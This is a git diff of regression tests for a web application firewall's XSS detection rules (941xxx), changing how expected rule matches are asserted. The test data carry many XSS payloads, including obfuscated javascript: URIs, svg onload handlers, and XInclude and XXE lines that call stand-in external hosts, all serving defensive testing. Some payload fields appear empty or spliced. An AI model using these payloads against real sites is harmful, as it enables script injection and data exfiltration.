+256,8 @@ tests: data: "var=<vqk xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include href=\"http://749kfyxln3k7toui76fcrksjeak3nybzzsmlaa.examplefoo.bar/foo\"/></vqk>" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 16 desc: "XSS test for 941130" stages: @@ -258,7 +273,8 @@ tests: data: "var=2010-01-01'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % fhklu SYSTEM \"http://fzisa6stibffowpq2eakmsnr9ifhii6mueh45t.example'||'foo.bar/\">%fhklu;" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 17 desc: "FP test for 941130" stages: @@ -273,7 +289,8 @@ tests: uri: "/post/api/v1/query?q=7XMLNS" version: HTTP/1.0 output: - no_log_contains: id "941130" + log: + no_expect_ids: [941130] - test_id: 18 desc: "XSS test with encoded newline for 941130" stages: @@ -289,7 +306,8 @@ tests: data: "var=<chj%0Axmlns=\"http://a.b/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://a.b/ http://1pre0sif8x51eifcs006ceddz45084w4kx7ovd.examplefoo.bar/chj.xsd\">chj</chj>" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 19 desc: "Status Test Page - simple test for 941130" stages: @@ -304,4 +322,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml index 104001d42..0bf49cdb2 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml @@ -19,7 +19,8 @@ tests: data: '9411400-1=%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E' version: "HTTP/1.1" output: - log_contains: id "941140" + log: + expect_ids: [941140] - test_id: 2 desc: XSS vectors making use of javascript uri and tags, e.g., <p style="background:url(javascript:alert(1))">, in ARGS_NAMES stages: @@ -35,7 +36,8 @@ tests: data: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' version: "HTTP/1.1" output: - log_contains: id "941140" + log: + expect_ids: [941140] - test_id: 3 desc: XSS vectors making use of javascript uri and tags, e.g., <p style="background:url(javascript:alert(1))">, in COOKIE stages: @@ -51,7 +53,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941140" + log: + expect_ids: [941140] - test_id: 4 desc: "Status Page Test - x=x:url(javascript as GET variable" stages: @@ -66,4 +69,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941140" + log: + expect_ids: [941140] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml index 03401b696..e24ca1ea8 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml @@ -19,7 +19,8 @@ tests: data: '941150-1%3D%3Ca%20href%3D%22test%22' version: "HTTP/1.1" output: - log_contains: id "941150" + log: + expect_ids: [941150] - test_id: 2 desc: Disallowed HTML entities, ARGS stages: @@ -35,4 +36,5 @@ tests: data: "payload=<a href=# language=\"JScript.Encode\" onclick=\"#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@\">XSS</a>" version: "HTTP/1.1" output: - log_contains: id "941150" + log: + expect_ids: [941150] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml index acbd0005e..474294e41 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml @@ -18,7 +18,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 2 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: @@ -33,7 +34,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 3 desc: "just another XSS teststring: <x onend=" stages: @@ -48,7 +50,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 4 desc: 'just another XSS teststring: "onzoom=' stages: @@ -63,7 +66,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 5 desc: "just another XSS teststring: 'formaction=" stages: @@ -78,7 +82,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 6 desc: "just another XSS teststring:< x: script" stages: @@ -93,7 +98,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 7 desc: "just another XSS teststring:<f o r m" stages: @@ -108,7 +114,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 8 desc: "just another XSS teststring: '<f o r m' in User-Agent header" stages: @@ -123,7 +130,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 9 desc: "just another XSS teststring: '<f o r m' in Referer header" stages: @@ -139,7 +147,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 10 desc: "just another XSS teststring: '<f o r m' in Cookie name" stages: @@ -155,7 +164,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 11 desc: "just another XSS teststring: '<f o r m' in Cookie value" stages: @@ -171,7 +181,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 12 desc: "just another XSS teststring: '<f o r m' in ARG NAME" stages: @@ -186,7 +197,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 13 desc: "just another XSS teststring: '<f o r m' in ARG VALUE" stages: @@ -201,7 +213,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 14 desc: "SVG onload injection with remote image" stages: @@ -217,7 +230,8 @@ tests: data: "var='\"><svg/onload=(new(Image)).src='//m8vzjd10riomx3yxblmcnvaskjghsdz8xorciu7\\56coreruleset.org'>" version: HTTP/1.0 output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 15 desc: "SVG onload injection in filename" stages: @@ -232,7 +246,8 @@ tests: uri: "/get/index.php/%3Csvg/onload=alert()" version: HTTP/1.0 output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 16 desc: "Detect XSS injection of 'dialog' tag ('<d i a l o g')" stages: @@ -247,4 +262,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941160" + log: + expect_ids: [941160] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml index 2417122a2..0b9f50040 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml @@ -18,7 +18,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941170" + log: + expect_ids: [941170] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,7 +35,8 @@ tests: data: "payload=javascript:/*-->" version: "HTTP/1.1" output: - log_contains: id "941170" + log: + expect_ids: [941170] - test_id: 3 desc: 'Test first backslash match (javascript:(?:[\s\S]+[=\x5c\(\[\.<]) with: javascript: \\\\t (extra backslashes to work around rule transformations)' stages: @@ -49,7 +51,8 @@ tests: Host: localhost version: "HTTP/1.1" output: - log_contains: id "941170" + log: + expect_ids: [941170] - test_id: 4 desc: 'Test second backslash match (javascript:(?:...|\x5c[ux]\d)) with: javascript:\\\\u0020 (extra backslashes to work around rule transformations)' stages: @@ -64,7 +67,8 @@ tests: Host: localhost version: "HTTP/1.1" output: - log_contains: id "941170" + log: + expect_ids: [941170] - test_id: 5 desc: "Status Page Test - data: , as GET variable" stages: @@ -79,4 +83,5 @@ tests: Host: localhost version: "HTTP/1.1" output: - log_contains: id "941170" + log: + expect_ids: [941170] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml index 8761c2eb6..198966a9c 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml @@ -19,7 +19,8 @@ tests: data: '941180-1=window.location' version: "HTTP/1.1" output: - log_contains: id "941180" + log: + expect_ids: [941180] - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: @@ -35,7 +36,8 @@ tests: data: 'document.cookie=941180-2' version: "HTTP/1.1" output: - log_contains: id "941180" + log: + expect_ids: [941180] - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: @@ -51,7 +53,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941180" + log: + expect_ids: [941180] - test_id: 4 desc: Negative test for Node-validator deny list keyword -->, present in stricter sibling 941181, ARGS stages: @@ -67,7 +70,8 @@ tests: data: '941180-4=-->' version: "HTTP/1.1" output: - no_log_contains: id "941180" + log: + no_expect_ids: [941180] - test_id: 5 desc: "XSS with embedded shell execution attempt (batch script)" stages: @@ -83,7 +87,8 @@ tests: data: "var=\"-->'-->`-->" version: HTTP/1.0 output: - log_contains: id "941180" + log: + expect_ids: [941180] - test_id: 6 desc: "Node-validator deny list keywords, ARGS, issue #2512" stages: @@ -99,7 +104,8 @@ tests: data: 'arg=...(document.domain)...' version: "HTTP/1.1" output: - log_contains: id "941180" + log: + expect_ids: [941180] - test_id: 7 desc: "We should not trigger on REQUEST_FILENAME without special characters" stages: @@ -114,4 +120,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: id "941180" + log: + no_expect_ids: [941180] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml index 5b2724d56..7daab475b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml @@ -19,7 +19,8 @@ tests: data: '941181-1=-->' version: "HTTP/1.1" output: - log_contains: id "941181" + log: + expect_ids: [941181] - test_id: 2 desc: Node-validator deny list keywords, ARGS stages: @@ -35,7 +36,8 @@ tests: data: '941181-1=--%3E' version: "HTTP/1.1" output: - log_contains: id "941181" + log: + expect_ids: [941181] - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: @@ -51,7 +53,8 @@ tests: data: '-->=941181-3' version: "HTTP/1.1" output: - log_contains: id "941181" + log: + expect_ids: [941181] - test_id: 4 desc: Node-validator deny list keywords, ARGS_NAMES stages: @@ -67,4 +70,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941181" + log: + expect_ids: [941181] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml index f81fc28d0..4312b627b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml @@ -19,7 +19,8 @@ tests: data: "941190-1=" version: "HTTP/1.1" output: - log_contains: id "941190" + log: + expect_ids: [941190] - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: @@ -35,7 +36,8 @@ tests: data: "x=" version: "HTTP/1.1" output: - log_contains: id "941190" + log: + expect_ids: [941190] - test_id: 3 desc: Node-validator deny list keywords, COOKIES_NAMES stages: @@ -51,7 +53,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941190" + log: + expect_ids: [941190] - test_id: 4 desc: Test first replaced backslash match (\x5c) stages: @@ -67,7 +70,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941190" + log: + expect_ids: [941190] - test_id: 5 desc: Test second replaced backslash match (\x5c) stages: @@ -83,4 +87,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941190" + log: + expect_ids: [941190] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml index 658e84c1f..039398355 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml @@ -19,7 +19,8 @@ tests: data: '941200-1=%3Cv%3Avmlframe%20src%3D%22foo.com%2Fsup.fml%22%2F%3E' version: "HTTP/1.1" output: - log_contains: id "941200" + log: + expect_ids: [941200] - test_id: 2 desc: Microsoft vmlframe xss, ARGS_NAMES stages: @@ -35,7 +36,8 @@ tests: data: '%3Cv%3Avmlframe%20src%3D%22foo.com%2Fsup.fml%22%2F%3E=941200-2' version: "HTTP/1.1" output: - log_contains: id "941200" + log: + expect_ids: [941200] - test_id: 3 desc: Microsoft vmlframe xss, REQUEST_COOKIE_NAMES stages: @@ -51,7 +53,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941200" + log: + expect_ids: [941200] - test_id: 4 desc: "Status Page Test - <:vmlframe src= as cookie content" stages: @@ -67,4 +70,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941200" + log: + expect_ids: [941200] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml index f52702372..7d98bc6eb 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml @@ -19,7 +19,8 @@ tests: data: '941210-1=ja%26tab%3Bvascript%3A%20' version: "HTTP/1.1" output: - log_contains: id "941210" + log: + expect_ids: [941210] - test_id: 2 desc: Obfuscated javascript tag in ARGS_NAMES, with tab stages: @@ -35,7 +36,8 @@ tests: data: 'ja%26tab%3Bvascript%3A%09=941210-2' version: "HTTP/1.1" output: - log_contains: id "941210" + log: + expect_ids: [941210] - test_id: 3 desc: Microsoft vmlframe xss, REQUEST_COOKIE_NAMES stages: @@ -51,7 +53,8 @@ tests: Accept: "*/*" version: "HTTP/1.1" output: - log_contains: id "941210" + log: + expect_ids: [941210] - test_id: 4 desc: "New line in javascript prefix, with ." stages: @@ -68,7 +71,8 @@ tests: data: '{"url":"javascript :alert(7)"}' version: HTTP/1.1 output: - log_contains: id "941210" + log: + expect_ids: [941210] - test_id: 5 desc: "Carriage return in javascript prefix, with ." stages: @@ -85,4 +89,5 @@ tests: data: '{"url":"jav ascript:alert(7)"}' version: HTTP/1.1 output: - log_contains: id "941210" + log: + expect_ids: [941210] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml index e475286f6..1b54be604 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml @@ -18,7 +18,8 @@ tests: data: "var=v%26newline;b%26tab;s%26newline;c%26newline;r%26tab;i%26tab;p%26newline;t%26colon;:&var2=whatever" version: HTTP/1.0 output: - log_contains: id "941220" + log: + expect_ids: [941220] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,4 +35,5 @@ tests: data: "payload=XSS" version: HTTP/1.0 output: - log_contains: id "941220" + log: + expect_ids: [941220] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml index d165cd0fe..1fba86ff7 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml @@ -18,7 +18,8 @@ tests: data: "var=&var2=whatever" version: HTTP/1.0 output: - log_contains: id "941230" + log: + expect_ids: [941230] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,4 +35,5 @@ tests: data: "payload=" version: HTTP/1.0 output: - log_contains: id "941230" + log: + expect_ids: [941230] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml index 2967f2214..da266e23a 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?var=%3c%3fimport%20implementation%20%3d" version: HTTP/1.0 output: - log_contains: id "941240" + log: + expect_ids: [941240] - test_id: 2 desc: "Status Page Test - IE XSS Filter " version: HTTP/1.0 output: - log_contains: id "941250" + log: + expect_ids: [941250] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml index de2b0b855..ff2d60e4e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml @@ -18,7 +18,8 @@ tests: data: "var=&var2=whatever" version: HTTP/1.0 output: - log_contains: id "941260" + log: + expect_ids: [941260] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,4 +35,5 @@ tests: data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" version: HTTP/1.0 output: - log_contains: id "941260" + log: + expect_ids: [941260] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml index 87ea07326..ba6208417 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" version: HTTP/1.0 output: - log_contains: id "941270" + log: + expect_ids: [941270] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -33,4 +34,5 @@ tests: version: HTTP/1.0 data: 'payload=' output: - log_contains: id "941270" + log: + expect_ids: [941270] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml index 7753e0936..cb30bdd5a 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" version: HTTP/1.0 output: - log_contains: id "941280" + log: + expect_ids: [941280] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,6 +35,7 @@ tests: uri: "/post" version: HTTP/1.0 data: 'payload=xss&var=whatever" version: HTTP/1.0 output: - log_contains: id "941290" + log: + expect_ids: [941290] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,4 +35,5 @@ tests: data: "payload=" version: HTTP/1.0 output: - log_contains: id "941290" + log: + expect_ids: [941290] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml index 4952f90dc..073fa65ef 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?%3cOBJECT%20data%20%3d=sdffdsa" version: HTTP/1.0 output: - log_contains: id "941300" + log: + expect_ids: [941300] - test_id: 2 desc: "IE XSS Filters" stages: @@ -33,4 +34,5 @@ tests: version: HTTP/1.0 data: "payload=" output: - log_contains: id "941300" + log: + expect_ids: [941300] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml index 7d7e98d5b..14f8c8907 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml @@ -20,7 +20,8 @@ tests: data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe version: "HTTP/1.1" output: - log_contains: id "941310" + log: + expect_ids: [941310] - test_id: 2 desc: Positive test using utf-8 stages: @@ -37,7 +38,8 @@ tests: data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe version: "HTTP/1.1" output: - log_contains: id "941310" + log: + expect_ids: [941310] - test_id: 3 desc: Positive test using alternate utf-8 stages: @@ -54,7 +56,8 @@ tests: data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe version: "HTTP/1.1" output: - log_contains: id "941310" + log: + expect_ids: [941310] - test_id: 4 desc: Real world false positive for old rule with Russian utf-8 characters stages: @@ -72,7 +75,8 @@ tests: data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 5 desc: Real world false positive for old rule with German utf-8 characters stages: @@ -90,7 +94,8 @@ tests: data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 6 desc: Negative test for opening tag stages: @@ -107,7 +112,8 @@ tests: data: var=\xbc\xbc version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 7 desc: Negative test for closing tag stages: @@ -124,7 +130,8 @@ tests: data: var=\xbe\xbe version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 8 desc: Negative for missing end tag, opening tag stages: @@ -141,7 +148,8 @@ tests: data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 9 desc: Negative for missing end tag, closing tag stages: @@ -158,7 +166,8 @@ tests: data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 10 desc: Negative using real world Russian example in utf-8 stages: @@ -176,7 +185,8 @@ tests: data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 11 desc: Negative using real world Russian example in utf-8, variant stages: @@ -194,7 +204,8 @@ tests: data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 12 desc: "Status Page Test - US-ASCII Malformed Encoding XSS Filter Attack" stages: @@ -211,4 +222,5 @@ tests: data: test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe version: "HTTP/1.1" output: - log_contains: id "941310" + log: + expect_ids: [941310] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml index 3c7a1ca8a..78cd01227 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml @@ -18,4 +18,5 @@ tests: data: "var=\">" output: - log_contains: id "941330" + log: + expect_ids: [941330] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml index d44fff9fb..d5c5238c6 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml @@ -18,7 +18,8 @@ tests: data: "var=' 